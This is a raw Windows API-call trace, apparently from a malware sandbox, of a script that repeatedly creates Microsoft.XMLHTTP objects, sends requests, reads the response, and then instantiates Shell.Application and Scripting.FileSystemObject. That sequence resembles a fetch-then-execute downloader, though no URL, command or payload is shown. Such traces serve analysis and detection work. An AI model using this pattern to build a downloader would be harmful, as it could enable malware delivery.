	[0419.893] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0419.960] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0419.960] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0419.960] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0419.960] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bc8) returned 0x0
	[0419.960] ??2@YAPEAX_K@Z () returned 0x62f330
	[0419.960] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bc8, pUnkSite=0x62f330) 
	[0419.960] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0419.960] XMLHTTPRequest:IUnknown:Release (This=0x49c5bc8) returned 0x0
	[0419.960] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0419.960] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0419.960] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0419.960] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0419.960] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0419.961] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0419.961] SysStringLen (param_1=0x0) returned 0x0
	[0419.961] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0419.961] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0419.961] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7250) returned 0x0
	[0419.961] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0419.961] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7250, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c72b8) returned 0x0
	[0419.961] ??2@YAPEAX_K@Z () returned 0x62f310
	[0419.961] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c72b8, pUnkSite=0x62f310) 
	[0419.961] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0419.961] XMLHTTPRequest:IUnknown:Release (This=0x49c72b8) returned 0x0
	[0419.961] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7250, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7250) returned 0x0
	[0419.961] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7250) returned 0x3
	[0419.961] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7250, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0419.961] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7250, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0419.961] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7250, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0419.962] longjmp () 
	[0419.962] longjmp () 
	[0419.962] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0419.962] SysStringLen (param_1=0x0) returned 0x0
	[0419.962] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0419.962] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0419.962] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5bc0) returned 0x0
	[0419.962] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0419.962] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bc0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c28) returned 0x0
	[0419.962] ??2@YAPEAX_K@Z () returned 0x62f330
	[0419.962] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c28, pUnkSite=0x62f330) 
	[0419.962] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0419.962] XMLHTTPRequest:IUnknown:Release (This=0x49c5c28) returned 0x0
	[0419.962] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bc0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5bc0) returned 0x0
	[0419.962] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5bc0) returned 0x3
	[0419.962] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bc0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0419.962] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bc0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0419.963] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bc0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0419.963] longjmp () 
	[0419.963] longjmp () 
	[0419.963] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0419.963] SysStringLen (param_1=0x0) returned 0x0
	[0419.963] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0419.963] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0419.963] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c72b0) returned 0x0
	[0419.963] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0419.963] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72b0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7318) returned 0x0
	[0419.963] ??2@YAPEAX_K@Z () returned 0x62f310
	[0419.963] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7318, pUnkSite=0x62f310) 
	[0419.963] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0419.963] XMLHTTPRequest:IUnknown:Release (This=0x49c7318) returned 0x0
	[0419.963] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72b0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c72b0) returned 0x0
	[0419.963] XMLHTTPRequest:IUnknown:AddRef (This=0x49c72b0) returned 0x3
	[0419.964] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0419.964] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0419.964] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0419.964] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0419.964] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0419.964] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0420.676] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0420.676] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0420.676] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0420.676] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0420.676] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0420.676] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0420.676] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0420.676] SysStringLen (param_1=0x0) returned 0x0
	[0420.676] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0420.676] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0420.676] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0420.677] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0420.677] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0420.677] ??2@YAPEAX_K@Z () returned 0x62f350
	[0420.677] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0420.677] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0420.677] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0420.677] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0420.677] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0420.677] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0420.677] SysStringLen (param_1=0x0) returned 0x0
	[0420.677] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0420.679] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0420.679] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0420.679] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0420.679] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0420.679] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0420.679] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0421.620] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0421.620] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0421.621] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0421.622] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
